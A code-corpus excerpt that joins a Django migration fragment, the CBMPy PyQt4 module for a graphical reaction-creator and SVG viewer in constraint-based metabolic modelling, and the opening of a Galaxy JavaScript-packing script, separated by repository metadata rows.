('cmsplugin_cascade', '0028_cascade_clipboard'),
]
operations = [
migrations.AlterField(
model_name='cascadeelement',
name='glossary',
field=models.JSONField(blank=True, default=dict),
),
migrations.AlterField(
model_name='cascadeclipboard',
name='data',
field=models.JSONField(blank=True, default=dict, null=True),
),
migrations.AlterField(
model_name='cascadepage',
name='glossary',
field=models.JSONField(blank=True, default=dict, help_text='Store for arbitrary page data.'),
),
migrations.AlterField(
model_name='cascadepage',
name='settings',
field=models.JSONField(blank=True, default=dict, help_text='User editable settings for this page.'),
),
migrations.AlterField(
model_name='iconfont',
name='config_data',
field=models.JSONField(),
),
migrations.AlterField(
model_name='inlinecascadeelement',
name='glossary',
field=models.JSONField(blank=True, default=dict),
),
migrations.AlterField(
model_name='pluginextrafields',
name='css_classes',
field=models.JSONField(blank=True, default=dict, null=True),
),
migrations.AlterField(
model_name='pluginextrafields',
name='inline_styles',
field=models.JSONField(blank=True, default=dict, null=True),
),
migrations.AlterField(
model_name='sharedglossary',
name='glossary',
field=models.JSONField(blank=True, default=dict, null=True),
),
migrations.AlterField(
model_name='sortableinlinecascadeelement',
name='glossary',
field=models.JSONField(blank=True, default=dict),
),
migrations.RunPython(migrations.RunPython.noop, reverse_code=backwards),
]
|
mit
| -3,055,507,169,678,262,000 | 33.161765 | 112 | 0.587602 | false | 4.467308 | false | false | false |
SystemsBioinformatics/cbmpy
|
cbmpy/CBQt4.py
|
1
|
32405
|
"""
CBMPy: CBQt4 module
===================
Constraint Based Modelling in Python (http://pysces.sourceforge.net/getNewReaction)
Copyright (C) 2009-2018 Brett G. Olivier, VU University Amsterdam, Amsterdam, The Netherlands
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>
Author: Brett G. Olivier
Contact email: [email protected]
Last edit: $Author: bgoli $ ($Id: CBQt4.py 710 2020-04-27 14:22:34Z bgoli $)
"""
# preparing for Python 3 port
from __future__ import division, print_function
from __future__ import absolute_import
#from __future__ import unicode_literals
import os
import time
import random
import math
import re
import webbrowser
import urllib2
from .CBCommon import pp_chemicalFormula
from .CBModel import Reaction as CBMReaction
HAVE_QT4 = False
try:
import PyQt4
from PyQt4 import QtCore, QtGui, QtSvg
from PyQt4.QtWebKit import QGraphicsWebView
HAVE_QT4 = True
print('Qt4 GUI tools available')
except ImportError as ex:
print('\nQt4 GUI tools not available.')
print(ex)
class ReactionCreator(QtGui.QWidget):
#_fba = None
_mlist = None
_rlist = None
_flist = None
_newSubs = None
_newProds = None
_fixColour = None
_errColour = None
_goodColour = None
_cfdict = None
_cndict = None
_ccdict = None
IGNORECHECK = False
ISBALANCED = True
NewReaction = None
_Blower = '-inf'
_Bupper = 'inf'
def __init__(self, rlist, mlist, flist, cfdict, cndict, ccdict):
super(ReactionCreator, self).__init__()
self.mousePos = self.cursor().pos()
rlist.sort()
mlist.sort()
flist.sort()
self._rlist = rlist
self._mlist = mlist
self._flist = flist
self._cfdict = cfdict
self._cndict = cndict
self._ccdict = ccdict
self._newSubs = []
self._newProds = []
self._fixColour = QtGui.QColor(0, 0, 153, alpha=255)
self._errColour = QtGui.QColor(255, 0, 0, alpha=255)
self._goodColour = QtGui.QColor(0, 100, 0, alpha=255)
self.initUI()
def addSubstrate(self, coeff, sid):
self.tblSub.insertRow(self.tblSubRow)
self.tblSub.setItem(self.tblSubRow, 0, QtGui.QTableWidgetItem('{}'.format(coeff)))
self.tblSub.setItem(self.tblSubRow, 1, QtGui.QTableWidgetItem('{}'.format(sid)))
CF = 'None'
if sid in self._cfdict:
CF = self._cfdict[sid]
self.tblSub.item(self.tblSubRow, 1).setToolTip(CF)
if sid in self._flist:
self.tblSub.item(self.tblSubRow, 1).setForeground(self._fixColour)
self.tblSub.item(self.tblSubRow, 0).setTextAlignment(QtCore.Qt.AlignCenter)
self.tblSubRow += 1
def addSelectedSubstrates(self):
self.IGNORECHECK = True
items = [str(it_.text()) for it_ in self.lstSub.selectedItems()]
self.setFocus(PyQt4.QtCore.Qt.OtherFocusReason)
# print(items)
for i_ in items:
if i_ not in self._newSubs:
self.addSubstrate(1, i_)
self._newSubs.append(i_)
self.IGNORECHECK = False
self.statusBar.showMessage('Substrates(s) added')
self.checkBalance()
def addProduct(self, coeff, sid):
self.tblProd.insertRow(self.tblProdRow)
self.tblProd.setItem(self.tblProdRow, 0, QtGui.QTableWidgetItem('{}'.format(coeff)))
self.tblProd.setItem(self.tblProdRow, 1, QtGui.QTableWidgetItem('{}'.format(sid)))
CF = 'None'
if sid in self._cfdict:
CF = self._cfdict[sid]
self.tblProd.item(self.tblProdRow, 1).setToolTip(CF)
if sid in self._flist:
self.tblProd.item(self.tblProdRow, 1).setForeground(self._fixColour)
self.tblProd.item(self.tblProdRow, 0).setTextAlignment(QtCore.Qt.AlignCenter)
self.tblProdRow += 1
def addSelectedProducts(self):
self.IGNORECHECK = True
items = [str(it_.text()) for it_ in self.lstProd.selectedItems()]
self.setFocus(PyQt4.QtCore.Qt.OtherFocusReason)
# print(items)
for i_ in items:
if i_ not in self._newProds:
self.addProduct(1, i_)
self._newProds.append(i_)
self.IGNORECHECK = False
self.statusBar.showMessage('Product(s) added')
self.checkBalance()
# def keyPressEvent(self, event):
#print('KeyPress key: {}'.format(str(event.key())))
# if event.key() == 16777223:
#print('You pressed the delete key')
def deleteSubstrates(self):
self.deleteReagents('substrate')
def deleteProducts(self):
self.deleteReagents('product')
def deleteAllSubstrates(self):
self.tblSub.clear()
for r_ in range(self.tblSubRow - 1, -1, -1):
self.tblSub.removeRow(r_)
self.tblSubRow = 0
self.checkBalance()
def deleteAllProducts(self):
self.tblProd.clear()
for r_ in range(self.tblProdRow - 1, -1, -1):
self.tblProd.removeRow(r_)
self.tblProdRow = 0
self.checkBalance()
def deleteReagents(self, reagentType):
selected = None
PRODACTIVE = False
SUBACTIVE = False
self.IGNORECHECK = True
if reagentType == 'substrate':
selected = [(it_.row(), it_.column()) for it_ in self.tblSub.selectedItems()]
SUBACTIVE = True
elif reagentType == 'product':
selected = [(it_.row(), it_.column()) for it_ in self.tblProd.selectedItems()]
PRODACTIVE = True
if selected != None:
deleteRow = []
if len(selected) == 2:
if selected[0][0] == selected[1][0]:
if selected[0][1] + 1 == selected[1][1]:
deleteRow.append(selected[0][0])
elif len(selected) > 2:
for it_ in range(0, len(selected), 2):
if selected[it_][1] == selected[it_ + 1][1]:
if selected[it_][0] + 1 == selected[it_ + 1][0]:
if selected[it_][0] not in deleteRow:
deleteRow.append(selected[it_][0])
if selected[it_][0] + 1 not in deleteRow:
deleteRow.append(selected[it_][0] + 1)
deleteRow.sort()
for d_ in range(len(deleteRow) - 1, -1, -1):
if SUBACTIVE:
print('Deleting Sub table row: {}'.format(deleteRow[d_]))
self.statusBar.showMessage('Substrate(s) deleted')
# print(self._newSubs)
#print(str(self.tblSub.item(d_, 1).text()))
self._newSubs.pop(self._newSubs.index(str(self.tblSub.item(d_, 1).text())))
self.tblSub.removeRow(deleteRow[d_])
self.tblSubRow -= 1
elif PRODACTIVE:
print('Deleting Prod table row: {}'.format(deleteRow[d_]))
self.statusBar.showMessage('Product(s) deleted')
# print(self._newProds)
#print(str(self.tblProd.item(d_, 1).text()))
self._newProds.pop(self._newProds.index(str(self.tblProd.item(d_, 1).text())))
self.tblProd.removeRow(deleteRow[d_])
self.tblProdRow -= 1
self.IGNORECHECK = False
self.checkBalance()
def checkBalance(self):
if self.IGNORECHECK:
return
output = {}
left = {}
right = {}
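        # Element bookkeeping: `output` accumulates the net balance per element
        # (product totals minus substrate totals), while `left` and `right` hold
        # the per-element totals of the substrate and product sides respectively.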
for r_ in range(self.tblSubRow):
sid = str(self.tblSub.item(r_, 1).text())
scoef = float(str(self.tblSub.item(r_, 0).text()))
# print scoef
if sid in self._cfdict:
cf = self._cfdict[sid]
if cf not in [None, 'None', '', ' ']:
cfl = pp_chemicalFormula.parseString(cf).asList()
else:
cfl = []
# print sid, cf, cfl
for e_ in cfl:
if e_[0] in output:
output[e_[0]] = output[e_[0]] + -scoef * float(e_[1])
# print scoef*float(e_[1])
else:
output[e_[0]] = -scoef * float(e_[1])
# print scoef*float(e_[1])
if e_[0] in left:
left[e_[0]] = left[e_[0]] + scoef * float(e_[1])
else:
left[e_[0]] = scoef * float(e_[1])
for r_ in range(self.tblProdRow):
sid = str(self.tblProd.item(r_, 1).text())
pcoef = float(str(self.tblProd.item(r_, 0).text()))
# print pcoef, type(pcoef)
if sid in self._cfdict:
cf = self._cfdict[sid]
if cf not in [None, 'None', '', ' ']:
cfl = pp_chemicalFormula.parseString(cf).asList()
else:
cfl = []
# print sid, cf, cfl
for e_ in cfl:
if e_[0] in output:
#print -pcoef*float(e_[1])
output[e_[0]] = output[e_[0]] + pcoef * float(e_[1])
else:
#print -pcoef*float(e_[1])
output[e_[0]] = pcoef * float(e_[1])
if e_[0] in right:
#print -pcoef*float(e_[1])
right[e_[0]] = right[e_[0]] + pcoef * float(e_[1])
else:
#print -pcoef*float(e_[1])
right[e_[0]] = pcoef * float(e_[1])
# print output
self.updateBalance(output, left, right)
# self.txtBal.setText(str(output))
def updateBalance(self, bdict, left, right):
colHead = []
keys = list(bdict)
if self.tblBalCol > 0:
for c_ in range(self.tblBalCol - 1, -1, -1):
self.tblBal.removeColumn(c_)
self.tblBalCol = 0
self.ISBALANCED = True
for k_ in range(len(keys)):
if not keys[k_] in left:
left[keys[k_]] = 'None'
if not keys[k_] in right:
right[keys[k_]] = 'None'
self.tblBalCol += 1
self.tblBal.insertColumn(k_)
self.tblBal.setItem(0, k_, QtGui.QTableWidgetItem('{}'.format(abs(bdict[keys[k_]]))))
self.tblBal.setItem(1, k_, QtGui.QTableWidgetItem('{}'.format(left[keys[k_]])))
self.tblBal.setItem(2, k_, QtGui.QTableWidgetItem('{}'.format(right[keys[k_]])))
self.tblBal.item(0, k_).setTextAlignment(QtCore.Qt.AlignCenter)
if k_ == 0:
boldFont = self.tblBal.item(0, k_).font()
boldFont.setBold(True)
self.tblBal.item(0, k_).setFont(boldFont)
self.tblBal.item(1, k_).setTextAlignment(QtCore.Qt.AlignCenter)
self.tblBal.item(2, k_).setTextAlignment(QtCore.Qt.AlignCenter)
if bdict[keys[k_]] != 0.0:
self.ISBALANCED = False
self.tblBal.item(0, k_).setForeground(self._errColour)
else:
self.tblBal.item(0, k_).setForeground(self._goodColour)
self.tblBal.setHorizontalHeaderLabels(QtCore.QStringList(keys))
def showErrorMessage(self, errorMsg, title="Reaction Creator"):
QtGui.QMessageBox.critical(None, title,
errorMsg,
QtGui.QMessageBox.Ok | QtGui.QMessageBox.Default,
QtGui.QMessageBox.NoButton)
self.statusBar.showMessage(errorMsg)
def getNewReaction(self):
reversible = self.btReverse.isChecked()
if not reversible and self._Blower == '-inf':
self._Blower = 0.0
Id = str(self.txtId.toPlainText()).strip()
Name = str(self.txtNm.toPlainText()).strip()
if Id == 'NewReactionId':
print('\nWARNING: using default reaction id')
errorMsg = None
if Id == "":
errorMsg = 'Reaction ID must be specified.'
elif Id in self._rlist:
errorMsg = 'Reaction ID \"{}\" already exists.'.format(Id)
if errorMsg != None:
self.showErrorMessage(errorMsg)
self.NewReaction = None
return None
if self.tblSubRow == 0 and self.tblProdRow == 0:
self.showErrorMessage('At least one reagent must be defined.')
self.NewReaction = None
return None
#print('\nid=\"{}\"\nname=\"{}\"'.format(Id, Name))
# print self.tblSub.rowCount(), self.tblSubRow
# print self.tblProd.rowCount(), self.tblProdRow
Reag = {}
exReac = False
for s_ in range(self.tblSub.rowCount()):
coeff = -abs(float(self.tblSub.item(s_, 0).text()))
Sid = str(self.tblSub.item(s_, 1).text()).strip()
if Sid in self._flist:
exReac = True
Reag[Sid] = coeff
for p_ in range(self.tblProd.rowCount()):
coeff = abs(float(self.tblProd.item(p_, 0).text()))
Sid = str(self.tblProd.item(p_, 1).text()).strip()
if Sid in self._flist:
exReac = True
if Sid in Reag:
Reag[Sid] += coeff
else:
Reag[Sid] = coeff
for r_ in tuple(Reag):
if Reag[r_] == 0.0:
Reag.pop(r_)
print('removing zero coefficient reagent: {}'.format(r_))
self.NewReaction = {'reversible': reversible,
'id': Id,
'name': Name,
'is_exchange': exReac,
'is_balanced': self.ISBALANCED,
'reagents': Reag,
'upper_bound': self._Bupper,
'lower_bound': self._Blower
}
sub = ''
prod = ''
for r_ in Reag:
coeff = abs(Reag[r_])
if Reag[r_] < 0.0:
if coeff == 1.0:
sub += '%s + ' % (r_)
else:
sub += '{%s} %s + ' % (coeff, r_)
else:
if coeff == 1.0:
prod += '%s + ' % (r_)
else:
prod += '{%s} %s + ' % (coeff, r_)
if reversible:
eq = '%s\n\t%s\n%s' % (sub[:-3], '<==>', prod[:-2])
else:
eq = '%s\n\t%s\n%s' % (sub[:-3], '-->', prod[:-2])
#quit_msg = "Add reaction:\n\n{}\n\t{}\n{}".format(sub,rev,prod)
quit_msg = eq
reply = QtGui.QMessageBox.question(self, 'Do you want to add the reaction \"{}\" to the model?'.format(Id),
quit_msg, QtGui.QMessageBox.Yes, QtGui.QMessageBox.No)
if reply == QtGui.QMessageBox.Yes:
self.statusBar.showMessage('Reaction {} added to model'.format(Id))
print(self.NewReaction)
QtGui.qApp.quit()
else:
print('Try again')
self.NewReaction = None
def initUI(self):
# create labels
lblSub = QtGui.QLabel('Substrates')
lblSub.setAlignment(QtCore.Qt.AlignCenter)
lblProd = QtGui.QLabel('Products')
lblProd.setAlignment(QtCore.Qt.AlignCenter)
lblId = QtGui.QLabel('Reaction id')
lblId.setAlignment(QtCore.Qt.AlignCenter)
lblNm = QtGui.QLabel('Reaction name')
lblNm.setAlignment(QtCore.Qt.AlignCenter)
# create text boxes
self.txtId = QtGui.QTextEdit()
self.txtId.setMaximumHeight(25)
self.txtId.setText('NewReactionId')
self.txtNm = QtGui.QTextEdit()
self.txtNm.setMaximumHeight(25)
self.txtNm.setText('NewReactionName')
self.txtBal = QtGui.QTextEdit()
self.txtBal.setMaximumHeight(40)
# create static lists
self.lstSub = QtGui.QListWidget()
self.lstSub.setSelectionMode(self.lstSub.ExtendedSelection)
self.lstProd = QtGui.QListWidget()
self.lstProd.setSelectionMode(self.lstProd.ExtendedSelection)
# populate lists
cntr = 0
for m_ in self._mlist:
cntr += 1
name = 'None'
comp = 'None'
if m_ in self._ccdict:
comp = self._ccdict[m_]
if m_ in self._cndict:
name = self._cndict[m_]
item = QtGui.QListWidgetItem(m_)
item.setToolTip('{}\t{}'.format(name, comp))
if m_ in self._flist:
item.setForeground(self._fixColour)
self.lstSub.addItem(item.clone())
self.lstProd.addItem(item)
# if cntr == 20: break
# create buttons
self.btAddSub = QtGui.QPushButton('Add substrate(s)')
QtCore.QObject.connect(self.btAddSub, QtCore.SIGNAL('clicked()'), self.addSelectedSubstrates)
self.btAddProd = QtGui.QPushButton('Add product(s)')
QtCore.QObject.connect(self.btAddProd, QtCore.SIGNAL('clicked()'), self.addSelectedProducts)
self.btReverse = QtGui.QPushButton('Reversible')
self.btReverse.setCheckable(True)
self.btReverse.setChecked(True)
# create tables
self.tblSub = QtGui.QTableWidget()
self.tblSub.setSortingEnabled(True)
self.tblSub.insertColumn(0)
self.tblSub.insertColumn(1)
self.tblSub.setHorizontalHeaderLabels(QtCore.QStringList(('Coefficient', 'Metabolite')))
self.tblSub.verticalHeader().setVisible(False)
QtCore.QObject.connect(self.tblSub, QtCore.SIGNAL('cellChanged(int,int)'), self.checkBalance)
self.tblSubRow = 0
self.tblProd = QtGui.QTableWidget()
self.tblProd.setSortingEnabled(True)
self.tblProd.insertColumn(0)
self.tblProd.insertColumn(1)
self.tblProd.setHorizontalHeaderLabels(QtCore.QStringList(('Coefficient', 'Metabolite')))
self.tblProd.verticalHeader().setVisible(False)
self.tblProdRow = 0
QtCore.QObject.connect(self.tblProd, QtCore.SIGNAL('cellChanged(int,int)'), self.checkBalance)
self.tblBal = QtGui.QTableWidget()
self.tblBal.setMaximumHeight(150)
self.tblBal.insertRow(0)
self.tblBal.insertRow(1)
self.tblBal.insertRow(2)
self.tblBal.verticalHeader().setVisible(False)
self.tblBalCol = 0
# set up menu and status bar
menuBar = QtGui.QMenuBar()
exitAction = QtGui.QAction('&Exit', self)
exitAction.setShortcut('Ctrl+Q')
        exitAction.setStatusTip('Exit and lose changes')
exitAction.triggered.connect(QtGui.qApp.quit)
addReAction = QtGui.QAction('&Add reaction and exit', self)
addReAction.setShortcut('Ctrl+A')
addReAction.setStatusTip('Add reaction to model and exit')
addReAction.triggered.connect(self.getNewReaction)
fileMenu = menuBar.addMenu('&Model')
fileMenu.addAction(exitAction)
fileMenu.addAction(addReAction)
subAddAction = QtGui.QAction('&Add', self)
subAddAction.triggered.connect(self.addSelectedSubstrates)
subDelAction = QtGui.QAction('&Delete selected', self)
subDelAction.triggered.connect(self.deleteSubstrates)
subDelAllAction = QtGui.QAction('&Delete all', self)
subDelAllAction.triggered.connect(self.deleteAllSubstrates)
subMenu = menuBar.addMenu('&Substrate')
subMenu.addAction(subAddAction)
subMenu.addAction(subDelAction)
subMenu.addAction(subDelAllAction)
prodAddAction = QtGui.QAction('&Add', self)
prodAddAction.triggered.connect(self.addSelectedProducts)
prodDelAction = QtGui.QAction('&Delete selected', self)
prodDelAction.triggered.connect(self.deleteProducts)
prodDelAllAction = QtGui.QAction('&Delete all', self)
prodDelAllAction.triggered.connect(self.deleteAllProducts)
prodMenu = menuBar.addMenu('&Product')
prodMenu.addAction(prodAddAction)
prodMenu.addAction(prodDelAction)
prodMenu.addAction(prodDelAllAction)
self.statusBar = QtGui.QStatusBar()
self.statusBar.showMessage('{} ready'.format('Model'))
# do layout
grid = QtGui.QGridLayout()
grid.setSpacing(10)
grid.addWidget(menuBar, 0, 0, 1, 2)
grid.addWidget(self.statusBar, 0, 2, 1, 2)
grid.addWidget(lblId, 1, 0)
grid.addWidget(self.txtId, 1, 1)
grid.addWidget(lblNm, 1, 2)
grid.addWidget(self.txtNm, 1, 3)
grid.addWidget(lblSub, 2, 0, 1, 2)
grid.addWidget(lblProd, 2, 2, 1, 2)
grid.addWidget(self.lstSub, 3, 0, 1, 2)
grid.addWidget(self.lstProd, 3, 2, 1, 2)
grid.addWidget(self.btAddSub, 4, 0)
grid.addWidget(self.btReverse, 4, 1, 1, 2)
grid.addWidget(self.btAddProd, 4, 3)
grid.addWidget(self.tblSub, 5, 0, 1, 2)
grid.addWidget(self.tblProd, 5, 2, 1, 2)
grid.addWidget(self.tblBal, 6, 0, 1, 4)
self.setLayout(grid)
self.setGeometry(self.mousePos.x() - 75, self.mousePos.y() - 75, 500, 640)
self.setWindowTitle('Reaction Creator')
self.show()
def createReaction(mod):
"""
Create a reaction using the graphical Reaction Creator
- *mod* a CBMPy model object
"""
cfdict = {}
cndict = {}
ccdict = {}
for s_ in mod.species:
cfdict[s_.getId()] = s_.getChemFormula()
cndict[s_.getId()] = s_.getName()
ccdict[s_.getId()] = s_.compartment
app = QtGui.QApplication([])
ex = ReactionCreator(mod.getReactionIds(), mod.getSpeciesIds(), mod.getBoundarySpeciesIds(), cfdict, cndict, ccdict)
app.exec_()
newR = ex.NewReaction
del app, ex
if newR == None:
return None
else:
R = CBMReaction(newR['id'], name=newR['name'], reversible=newR['reversible'])
R.is_balanced = newR['is_balanced']
R.is_exchange = newR['is_exchange']
for r_ in newR['reagents']:
R.createReagent(r_, newR['reagents'][r_])
mod.getSpecies(r_).setReagentOf(newR['id'])
mod.addReaction(R, create_default_bounds=False)
mod.createReactionLowerBound(newR['id'], newR['lower_bound'])
mod.createReactionUpperBound(newR['id'], newR['upper_bound'])
return R
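# Usage sketch (the model file name is an assumption; any loaded CBMPy model works):
#
#   import cbmpy
#   mod = cbmpy.readSBML3FBC('my_model.xml')
#   new_reac = createReaction(mod)   # opens the Qt4 Reaction Creator dialogue
#   if new_reac is not None:
#       print('Added reaction: {}'.format(new_reac.getId()))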
class CBFileDialogue(QtGui.QWidget):
_appTitle = 'Open file'
work_dir = None
model_file = None
mode = None
def __init__(self, work_dir, mode='open', filters=None):
super(CBFileDialogue, self).__init__()
self.mousePos = self.cursor().pos()
self.work_dir = work_dir
self.mode = mode
if mode == 'save':
self._appTitle = 'Save file'
self.initUI()
def initUI(self):
#self.setAttribute(QtCore.Qt.WA_DeleteOnClose, True)
# self.setHidden(True)
self.__dlg__ = QtGui.QFileDialog(self)
if self.mode == 'open':
#self.model_file = str(self.__dlg__.getOpenFileName(self, 'Open file', self.work_dir, options=QtGui.QFileDialog.DontUseNativeDialog))
self.model_file = str(self.__dlg__.getOpenFileName(self, 'Open file', self.work_dir))
elif self.mode == 'save':
#self.model_file = str(self.__dlg__.getSaveFileName(self, 'Save file as', self.work_dir, options=QtGui.QFileDialog.DontUseNativeDialog))
self.model_file = str(self.__dlg__.getSaveFileName(self, 'Save file as', self.work_dir))
self.model_file = os.path.normpath(self.model_file)
def fileDialogue(work_dir=None, mode='open', filters=None):
if work_dir == None:
work_dir = os.getcwd()
if mode in ['open', 'save']:
app = QtGui.QApplication([])
fileApp = CBFileDialogue(work_dir, mode=mode, filters=filters)
model_file = fileApp.model_file
fileApp.__dlg__.done(1)
app.exit()
if mode == 'open':
return model_file
else:
return True
class ViewSVG(QtGui.QWidget):
_fixColour = None
_errColour = None
_goodColour = None
_appTitle = 'ViewSVG'
def __init__(self, filename):
super(ViewSVG, self).__init__()
self.mousePos = self.cursor().pos()
self._fixColour = QtGui.QColor(0, 0, 153, alpha=255)
self._errColour = QtGui.QColor(255, 0, 0, alpha=255)
self._goodColour = QtGui.QColor(0, 100, 0, alpha=255)
self.filename = os.path.abspath(filename)
print('\nViewing file: {}'.format(filename))
self.initUI()
def initUI(self):
# create panels
self.txtId = QtGui.QTextEdit()
# set up menu and status bar
menuBar = QtGui.QMenuBar()
exitAction = QtGui.QAction('&Exit', self)
exitAction.setShortcut('Ctrl+Q')
        exitAction.setStatusTip('Exit and lose changes')
exitAction.triggered.connect(QtGui.qApp.quit)
fileMenu = menuBar.addMenu('&File')
fileMenu.addAction(exitAction)
self.statusBar = QtGui.QStatusBar()
self.statusBar.showMessage('Ready ...')
# webkit panel
scene = QtGui.QGraphicsScene()
view = QtGui.QGraphicsView(scene)
br = QtSvg.QGraphicsSvgItem(self.filename).boundingRect()
webview = QGraphicsWebView()
# webview.load(QtCore.QUrl("C:\your_interactive_svg.svg"))
webview.load(QtCore.QUrl(QtCore.QUrl.fromLocalFile(self.filename)))
webview.setFlags(QtGui.QGraphicsItem.ItemClipsToShape)
webview.setCacheMode(QtGui.QGraphicsItem.NoCache)
webview.resize(br.width(), br.height())
scene.addItem(webview)
view.resize(br.width() + 10, br.height() + 10)
# view.show()
# do layout
grid = QtGui.QGridLayout()
grid.setSpacing(10)
grid.addWidget(menuBar, 0, 0, 1, 2)
#grid.addWidget(self.txtId, 1, 0, 1, 2)
grid.addWidget(view, 1, 0, 4, 4)
grid.addWidget(self.statusBar, 5, 0, 1, 4)
self.setLayout(grid)
self.setGeometry(self.mousePos.x() - 75, self.mousePos.y() - 75, 500, 640)
self.setWindowTitle(self._appTitle)
self.show()
def loadViewSVG(filename):
app = QtGui.QApplication([])
ex = ViewSVG(filename)
app.exec_()
class ValueSlider(QtGui.QWidget):
_fixColour = None
_errColour = None
_goodColour = None
_appTitle = 'ValueSlider'
def __init__(self):
super(ValueSlider, self).__init__()
self.mousePos = self.cursor().pos()
self._fixColour = QtGui.QColor(0, 0, 153, alpha=255)
self._errColour = QtGui.QColor(255, 0, 0, alpha=255)
self._goodColour = QtGui.QColor(0, 100, 0, alpha=255)
self.initUI()
def initUI(self):
# create panels
#self.txtId = QtGui.QTextEdit()
l1a = QtGui.QLabel(self)
l1a.setText('Property')
sld1 = QtGui.QSlider(QtCore.Qt.Horizontal, self)
sld1.setTickPosition(sld1.TicksBelow)
sld1_min = -100
sld1_max = 100
sld1.setMinimum(sld1_min)
sld1.setMaximum(sld1_max)
        # QSlider works in integer steps and expects a positive tick interval
        sld1.setTickInterval((sld1_max - sld1_min) // 10)
        sld1.setSingleStep(1)
sld1.setFocusPolicy(QtCore.Qt.NoFocus)
sld1.valueChanged[int].connect(self.changeValue)
self.l1b = QtGui.QLabel(self)
self.l1b.setText('0.0')
# do layout
grid = QtGui.QGridLayout()
grid.setSpacing(10)
grid.addWidget(l1a, 0, 0, 1, 1)
grid.addWidget(self.l1b, 0, 1, 1, 1)
grid.addWidget(sld1, 0, 2, 1, 5)
#grid.addWidget(self.txtId, 1, 0, 1, 2)
#grid.addWidget(menuBar, 0, 0)
#grid.addWidget(self.statusBar, 0, 1)
self.setLayout(grid)
self.setGeometry(self.mousePos.x() - 75, self.mousePos.y() - 75, 280, 170)
self.setWindowTitle(self._appTitle)
self.show()
def changeValue(self, value):
getattr(self, 'l1b').setText('{}'.format(value))
def loadSlider():
app = QtGui.QApplication([])
ex = ValueSlider()
app.exec_()
data = "<DATASTART><return>{}</return>"
if __name__ == '__main__':
print(os.sys.argv)
if os.sys.argv[1] == 'fileOpen':
filename = fileDialogue(work_dir=None, mode='open', filters=None)
print(data.format(filename))
os.sys.exit(0)
# subprocess.check_output(['python', '_qtloader.py', 'fileOpen']).split('<DATASTART>')[1].strip()
# template widget
"""
class SmallAppBasicGrid(QtGui.QWidget):
_fixColour = None
_errColour = None
_goodColour = None
_appTitle = 'SmallAppBaseGrid'
def __init__(self):
super(SmallAppBasicGrid, self).__init__()
self.mousePos = self.cursor().pos()
self._fixColour = QtGui.QColor(0,0,153,alpha=255)
self._errColour = QtGui.QColor(255,0,0,alpha=255)
self._goodColour = QtGui.QColor(0,100,0,alpha=255)
self.initUI()
def initUI(self):
# create panels
self.txtId = QtGui.QTextEdit()
# set up menu and status bar
menuBar = QtGui.QMenuBar()
exitAction = QtGui.QAction('&Exit', self)
exitAction.setShortcut('Ctrl+Q')
        exitAction.setStatusTip('Exit and lose changes')
exitAction.triggered.connect(QtGui.qApp.quit)
fileMenu = menuBar.addMenu('&File')
fileMenu.addAction(exitAction)
self.statusBar = QtGui.QStatusBar()
self.statusBar.showMessage('Ready ...')
# do layout
grid = QtGui.QGridLayout()
grid.setSpacing(10)
grid.addWidget(menuBar, 0, 0, 1, 2)
grid.addWidget(self.txtId, 1, 0, 1, 2)
grid.addWidget(self.statusBar, 2, 0, 1, 2)
self.setLayout(grid)
self.setGeometry(self.mousePos.x()-75, self.mousePos.y()-75, 500, 640)
self.setWindowTitle(self._appTitle)
self.show()
def loadBasicApp(mod):
app = QtGui.QApplication([])
ex = SmallAppBasicGrid()
app.exec_()
"""
# template microGUI
"""
class MicroGUI(QtGui.QWidget):
_appTitle = 'MicroGUI'
def __init__(self):
super(MicroGUI, self).__init__()
self.mousePos = self.cursor().pos()
self.work_dir = work_dir
self.initUI()
def initUI(self):
self.setAttribute(QtCore.Qt.WA_DeleteOnClose, True)
self.setHidden(True)
# action code (this example is for opening a file dialogue)
self.model_file = str(QtGui.QFileDialog.getOpenFileName(self, 'Open file', os.getcwd()))
def loadMicroGUI(*args):
app = QtGui.QApplication([])
mGUI = OpenFileDialogue()
appTitle = mGUI._appTitle
del mGUI, app
return
"""
"""
import sys
from PyQt4 import QtCore, QtGui, QtSvg
from PyQt4.QtWebKit import QGraphicsWebView
if __name__ == "__main__":
app = QtGui.QApplication(sys.argv)
scene = QtGui.QGraphicsScene()
view = QtGui.QGraphicsView(scene)
br = QtSvg.QGraphicsSvgItem("C:\your_interactive_svg.svg").boundingRect()
webview = QGraphicsWebView()
webview.load(QtCore.QUrl("C:\your_interactive_svg.svg"))
webview.load(QtCore.QUrl(QtCore.QUrl.fromLocalFile("C:\your_interactive_svg.svg")))
webview.setFlags(QtGui.QGraphicsItem.ItemClipsToShape)
webview.setCacheMode(QtGui.QGraphicsItem.NoCache)
webview.resize(br.width(), br.height())
scene.addItem(webview)
view.resize(br.width()+10, br.height()+10)
view.show()
sys.exit(app.exec_())
"""
|
gpl-3.0
| 6,245,848,769,703,354,000 | 35.823864 | 148 | 0.568523 | false | 3.626749 | false | false | false |
mikel-egana-aranguren/SADI-Galaxy-Docker
|
galaxy-dist/static/scripts/pack_scripts.py
|
1
|
1952
|
#!/usr/bin/env python
import sys, os
from glob import glob
from subprocess import call
from shutil import copyfile
from os import path
# Scripts that should not be packed -- just copied
do_not_pack = set()
cmd = "java -jar ../../scripts/yuicompressor.jar --charset utf-8 --type js %(fname)s -o packed/%(fname)s"
# cmd = "java -jar ../../scripts/compiler.jar --compilation_level SIMPLE_OPTIMIZATIONS --js %(fname)s --js_output_file packed/%(fname)s"
# If specific scripts specified on command line, just pack them, otherwise pack
# all.
def recursive_glob( pattern, excluded_dirs ):
"""
Returns all items that match pattern in root and subdirectories.
"""
a_dir, a_pattern = path.split( pattern )
# Skip excluded dirs.
if a_dir in excluded_dirs:
return []
# Search current dir.
# print a_dir, a_pattern
rval = glob( pattern )
for item in glob( path.join( a_dir, "*" ) ):
if path.isdir( item ):
rval.extend( recursive_glob( path.join( item, a_pattern ), excluded_dirs ) )
return rval
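# For example, recursive_glob("*.js", ["packed"]) collects every *.js file in the
# current tree while skipping the "packed" directory (the exclusion compares the
# full directory prefix of the expanded pattern).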
# Get files to pack.
if len( sys.argv ) > 1:
to_pack = sys.argv[1:]
else:
to_pack = recursive_glob( "*.js", [ "packed" ] )
for fname in to_pack:
d = dict( fname=fname )
packed_fname = path.join( 'packed', fname )
# Only copy if full version is newer than packed version.
